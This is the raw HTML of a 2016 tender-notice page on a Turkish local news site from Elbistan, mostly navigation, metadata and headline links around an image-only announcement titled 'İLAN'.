<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <title>İLAN</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="İLAN"> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="İLAN"> <meta property="og:description" content="İLAN"> <meta property="og:url" content="http://www.elbistaninsesi.com/ihale-ilanlari/ilan-h37216.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2016/12/ilan_h37216_872d2.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="İLAN"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/ihale-ilanlari/ilan-h37216.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content=""> <meta name="twitter:title" content="İLAN"> <meta name="twitter:description" content="İLAN"> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2016/12/ilan_h37216_872d2.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2016/12/ilan_h37216_872d2.jpg" /> <meta itemprop="headline" content="İLAN" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ilan_h37216_872d2.jpg" /> <meta itemprop="articleSection" content="İhale İlanları" name="section" /> <meta itemprop="dateCreated" content="2016-12-23T08:50:10+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2016/12/ilan_h37216_872d2.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '9'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = ''; var facebook_user = 'https://www.facebook.com/elbistanin.sesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">3.5122</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">3.6713</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">127.406</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">77405</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanspor-gol-oldu-yagdi-h37078.html" title="Elbistanspor, gol oldu yağdı" >Elbistanspor, gol oldu yağdı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanli-2-polis-memuru-hain-saldirida-yaralandi-h37068.html" title="Elbistanlı 2 polis memuru hain saldırıda yaralandı" >Elbistanlı 2 polis memuru hain saldırıda yaralandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/4-firinciya-ornek-isyeri-belgesi-takdim-edildi-h37009.html" title="4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi" >4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/hasta-sayisi-35-bin-sebebi-kirlilik-ve-dikkatsizlik-h35965.html" title="Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK" >Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sehit-yarbay-ozer-dualarla-ugurlandi-h35408.html" title="Şehit Yarbay Özer, dualarla uğurlandı" >Şehit Yarbay Özer, dualarla uğurlandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-sehit-acisiyla-kara-bayrami-yasadi-h35406.html" title="Elbistan, şehit acısıyla kara bayramı yaşadı" >Elbistan, şehit acısıyla kara bayramı yaşadı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/giresundaki-helikopter-kazasinda-elbistanli-yarbay-sehit-oldu-h35405.html" title="Giresun’daki helikopter kazasında Elbistanlı Yarbay şehit oldu" >Giresun’daki helikopter kazasında Elbistanlı Yarbay şehit oldu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/vali-yardimcisi-kurtoglu-intihar-girisiminde-bulundu-h34851.html" title="Vali Yardımcısı Kurtoğlu, intihar girişiminde bulundu" >Vali Yardımcısı Kurtoğlu, intihar girişiminde bulundu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/dedenin-2-bin-700-yillik-tarihi-gun-yuzune-cikiyor-h34432.html" title="Dede’nin 2 bin 700 yıllık tarihi gün yüzüne çıkıyor" >Dede’nin 2 bin 700 yıllık tarihi gün yüzüne çıkıyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/baskan-kisacadan-kilicdarogluna-sert-tepki-h34329.html" title="Başkan Kısaca’dan Kılıçdaroğlu’na sert tepki" >Başkan Kısaca’dan Kılıçdaroğlu’na sert tepki</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="e709b30b4fade77b80068758bad836cf01f55f9c" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/logo2.png" alt="İLAN" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="İhale İlanları" href="http://www.elbistaninsesi.com/ihale-ilanlari" id="k15" class="current" >İhale İlanları</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/arife-ulger-95-yasinda-h37211.html" title="Arife Ülger 95 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/arife_ulger_95_yasinda_h37211_cb5e8.jpg" alt="Arife Ülger 95 yaşında" /> Arife Ülger 95 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hakki-taskin-63-yasinda-h37205.html" title="Hakkı Taşkın 63 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/hakki_taskin_63_yasinda_h37205_264f5.jpg" alt="Hakkı Taşkın 63 yaşında" /> Hakkı Taşkın 63 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/sefer-burak-72-yasinda-h37181.html" title="Sefer Burak 72 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/sefer_burak_72_yasinda_h37181_547d5.jpg" alt="Sefer Burak 72 yaşında" /> Sefer Burak 72 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/sevket-ozcan-78-yasinda-h37170.html" title="Şevket Özcan 78 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/sevket_ozcan_78_yasinda_h37170_f9a6d.jpg" alt="Şevket Özcan 78 yaşında" /> Şevket Özcan 78 yaşında</a> </div> </div></div><div class="katelement kat_k15"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/ilan-h37216.html" title="İLAN"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ilan_h37216_872d2.jpg" alt="İLAN" /> İLAN</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/kesme-ve-taslama-taslarinin-alimi-h37204.html" title="KESME VE TAŞLAMA TAŞLARININ ALIMI"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/kesme_ve_taslama_taslarinin_alimi_h37204_8dae9.jpg" alt="KESME VE TAŞLAMA TAŞLARININ ALIMI" /> KESME VE TAŞLAMA TAŞLARININ ALIMI</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/akaryakit-satin-alinacaktir-h37180.html" title="AKARYAKIT SATIN ALINACAKTIR"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/akaryakit_satin_alinacaktir_h37180_fff9e.jpg" alt="AKARYAKIT SATIN ALINACAKTIR" /> AKARYAKIT SATIN ALINACAKTIR</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37179.html" title="T.C. ELBİSTAN İCRA DAİRESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/tc_elbistan_icra_dairesi_h37179_555c9.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> T.C. ELBİSTAN İCRA DAİRESİ</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/cuma-gunu-egitime-devam-edilecek-h37215.html" title="Cuma günü eğitime devam edilecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/cuma_gunu_egitime_devam_edilecek_h37215_0fbd3.Jpeg" alt="Cuma günü eğitime devam edilecek" /> Cuma günü eğitime devam edilecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kesenden-terore-tepki-h37210.html" title="Kesen’den teröre tepki"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/kesenden_terore_tepki_h37210_e7ad2.JPG" alt="Kesen’den teröre tepki" /> Kesen’den teröre tepki</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-akkoyun-saglikli-su-paneline-katildi-h37209.html" title="Kaymakam Akkoyun, Sağlıklı Su Paneli’ne katıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/kaymakam_akkoyun_saglikli_su_paneline_katildi_h37209_544ce.jpg" alt="Kaymakam Akkoyun, Sağlıklı Su Paneli’ne katıldı" /> Kaymakam Akkoyun, Sağlıklı Su Paneli’ne katıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/56-kursiyer-sertifikali-suru-yonetimi-elemani-oldu-h37208.html" title="56 kursiyer, sertifikalı ‘sürü yönetimi elemanı’ oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/56_kursiyer_sertifikali_suru_yonetimi_elemani_oldu_h37208_a3a25.JPG" alt="56 kursiyer, sertifikalı ‘sürü yönetimi elemanı’ oldu" /> 56 kursiyer, sertifikalı ‘sürü yönetimi elemanı’ oldu</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhpden-jandarmaya-moral-ve-destek-ziyareti-h37196.html" title="MHP’den jandarmaya moral ve destek ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/mhpden_jandarmaya_moral_ve_destek_ziyareti_h37196_43125.jpg" alt="MHP’den jandarmaya moral ve destek ziyareti" /> MHP’den jandarmaya moral ve destek ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/altiok-baskanlik-sistemini-topyekn-reddediyoruz-h37191.html" title="Altıok: “Başkanlık sistemini topyekûn reddediyoruz”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/altiok_baskanlik_sistemini_topyekn_reddediyoruz_h37191_ee435.JPG" alt="Altıok: “Başkanlık sistemini topyekûn reddediyoruz”" /> Altıok: “Başkanlık sistemini topyekûn reddediyoruz”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-partiden-emyo-ve-kykya-ziyaret-h37188.html" title="AK Parti’den EMYO ve KYK’ya ziyaret"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ak_partiden_emyo_ve_kykya_ziyaret_h37188_5f932.jpg" alt="AK Parti’den EMYO ve KYK’ya ziyaret" /> AK Parti’den EMYO ve KYK’ya ziyaret</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-kisaca-hainlerin-girdigi-her-delik-baslarina-yikilacak-h37173.html" title="Başkan Kısaca: “Hainlerin girdiği her delik başlarına yıkılacak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/baskan_kisaca_hainlerin_girdigi_her_delik_baslarina_yikilacak_h37173_b264a.JPG" alt="Başkan Kısaca: “Hainlerin girdiği her delik başlarına yıkılacak”" /> Başkan Kısaca: “Hainlerin girdiği her delik başlarına yıkılacak”</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/yeni-hastane-ile-yogun-bakim-kapasitesi-de-artiyor-h37073.html" title="Yeni hastane ile yoğun bakım kapasitesi de artıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/yeni_hastane_ile_yogun_bakim_kapasitesi_de_artiyor_h37073_8c398.jpg" alt="Yeni hastane ile yoğun bakım kapasitesi de artıyor" /> Yeni hastane ile yoğun bakım kapasitesi de artıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/150-milyonluk-yatirim-gun-sayiyor-h37054.html" title="150 milyonluk yatırım gün sayıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/150_milyonluk_yatirim_gun_sayiyor_h37054_cd053.JPG" alt="150 milyonluk yatırım gün sayıyor" /> 150 milyonluk yatırım gün sayıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/kahramanmarasta-onkoloji-tani-tedavi-merkezi-hizmete-acildi-h37017.html" title="Kahramanmaraş’ta Onkoloji Tanı Tedavi Merkezi hizmete açıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/kahramanmarasta_onkoloji_tani_tedavi_merkezi_hizmete_acildi_h37017_73e10.jpg" alt="Kahramanmaraş’ta Onkoloji Tanı Tedavi Merkezi hizmete açıldı" /> Kahramanmaraş’ta Onkoloji Tanı Tedavi Merkezi hizmete açıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/ogrenciler-hastaliklara-karsi-asilanacak-h37012.html" title="Öğrenciler hastalıklara karşı aşılanacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ogrenciler_hastaliklara_karsi_asilanacak_h37012_978ac.jpg" alt="Öğrenciler hastalıklara karşı aşılanacak" /> Öğrenciler hastalıklara karşı aşılanacak</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ev-hanimiyken-tualle-tanisti-hayati-degisti-h37214.html" title="Ev hanımıyken tualle tanıştı, hayatı değişti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ev_hanimiyken_tualle_tanisti_hayati_degisti_h37214_fd960.JPG" alt="Ev hanımıyken tualle tanıştı, hayatı değişti" /> Ev hanımıyken tualle tanıştı, hayatı değişti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ihl-ogrencileri-ezan-ve-kuran-i-guzel-okumak-icin-yaristi-h37213.html" title="İHL öğrencileri, Ezan ve Kur’an-ı güzel okumak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ihl_ogrencileri_ezan_ve_kuran_i_guzel_okumak_icin_yaristi_h37213_feaea.JPG" alt="İHL öğrencileri, Ezan ve Kur’an-ı güzel okumak için yarıştı" /> İHL öğrencileri, Ezan ve Kur’an-ı güzel okumak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ogrencilerden-anlamli-ziyaret-h37212.html" title="Öğrencilerden anlamlı ziyaret"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ogrencilerden_anlamli_ziyaret_h37212_d0b3f.jpg" alt="Öğrencilerden anlamlı ziyaret" /> Öğrencilerden anlamlı ziyaret</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/sair-durna-birincilik-odulunu-aldi-h37206.html" title="Şair Durna, birincilik ödülünü aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/sair_durna_birincilik_odulunu_aldi_h37206_f48e0.jpg" alt="Şair Durna, birincilik ödülünü aldı" /> Şair Durna, birincilik ödülünü aldı</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/voleybol-turnuvasina-12-takim-katiliyor-h37192.html" title="Voleybol Turnuvası’na 12 takım katılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/voleybol_turnuvasina_12_takim_katiliyor_h37192_08edb.JPG" alt="Voleybol Turnuvası’na 12 takım katılıyor" /> Voleybol Turnuvası’na 12 takım katılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-galibiyet-serisini-surduruyor-h37172.html" title="Elbistanspor, galibiyet serisini sürdürüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/elbistanspor_galibiyet_serisini_surduruyor_h37172_9ff9d.JPG" alt="Elbistanspor, galibiyet serisini sürdürüyor" /> Elbistanspor, galibiyet serisini sürdürüyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/yildiz-kiz-futsal-turnuvasi-sona-erdi-h37150.html" title="Yıldız Kız Futsal Turnuvası sona erdi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/yildiz_kiz_futsal_turnuvasi_sona_erdi_h37150_6709e.jpg" alt="Yıldız Kız Futsal Turnuvası sona erdi" /> Yıldız Kız Futsal Turnuvası sona erdi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistansporda-ibrahim-kocak-donemi-h37108.html" title="Elbistanspor’da İbrahim Koçak dönemi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/elbistansporda_ibrahim_kocak_donemi_h37108_19a94.jpg" alt="Elbistanspor’da İbrahim Koçak dönemi" /> Elbistanspor’da İbrahim Koçak dönemi</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/sekerdeki-polar-kaybinin-maliyeti-10-milyon-lira-h37195.html" title="Şekerdeki polar kaybının maliyeti 10 milyon lira"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/sekerdeki_polar_kaybinin_maliyeti_10_milyon_lira_h37195_c57cc.JPG" alt="Şekerdeki polar kaybının maliyeti 10 milyon lira" /> Şekerdeki polar kaybının maliyeti 10 milyon lira</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/pancardaki_polar_orani_mahkemelik_oldu_h37167_5a93a.jpg" alt="Pancardaki polar oranı, mahkemelik oldu" /> Pancardaki polar oranı, mahkemelik oldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/esnaflardan-kredi-imknina-yogun-ilgi-h37162.html" title="Esnaflardan kredi imkânına yoğun ilgi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/esnaflardan_kredi_imknina_yogun_ilgi_h37162_b4e29.JPG" alt="Esnaflardan kredi imkânına yoğun ilgi" /> Esnaflardan kredi imkânına yoğun ilgi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/elbistanda-3-milyon-722-bin-liralik-su-borcu-yapilandirildi-h37128.html" title="Elbistan’da 3 milyon 722 bin liralık su borcu yapılandırıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/elbistanda_3_milyon_722_bin_liralik_su_borcu_yapilandirildi_h37128_fc083.jpg" alt="Elbistan’da 3 milyon 722 bin liralık su borcu yapılandırıldı" /> Elbistan’da 3 milyon 722 bin liralık su borcu yapılandırıldı</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails"> <li class="span3"><a href="http://www.elbistaninsesi.com/egitim-kultur/ev-hanimiyken-tualle-tanisti-hayati-degisti-h37214.html" title="Ev hanımıyken tualle tanıştı, hayatı değişti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2016/12/3.jpg" alt="Ev hanımıyken tualle tanıştı, hayatı değişti" class="pull-left" /> <div class="caption-line"><p>Ev hanımıyken tualle tanıştı, hayatı...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kesenden-terore-tepki-h37210.html" title="Kesen’den teröre tepki" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2016/12/kesen.jpg" alt="Kesen’den teröre tepki" class="pull-left" /> <div class="caption-line"><p>Kesen’den teröre tepki</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/afsinli-uzman-cavus-firat-kalkani-harektinda-yaralandi-h37202.html" title="Afşinli Uzman Çavuş, Fırat Kalkanı Harekâtında yaralandı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2016/12/afYinli_uzman_cavuY_fYrat_kalkanY_2.jpg" alt="Afşinli Uzman Çavuş, Fırat Kalkanı Harekâtında yaralandı" class="pull-left" /> <div class="caption-line"><p>Afşinli Uzman Çavuş, Fırat Kalkanı...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/okullara-kar-tatili-geldi-h37201.html" title="Okullara kar tatili geldi" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2016/12/ilce_genelindeki_okullar_tatil_edildi_h37102_d54e5.jpeg" alt="Okullara kar tatili geldi" class="pull-left" /> <div class="caption-line"><p>Okullara kar tatili geldi</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">İLAN</h1> <h2 class="lead" itemprop="description"><strong>İLAN</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2016-12-23 08:50:10" content="2016-12-23T08:50:10+02:00">23 Aralık 2016 Cuma 08:50</span></p> <p class="pull-right">Bu haber <b class="hitCounter"></b> kez okundu.</p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2016/12/ilan_h37216_872d2.jpg" alt="İLAN" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/ihale-ilanlari/ilan-h37216.html" data-width="100" data-layout="button_count" 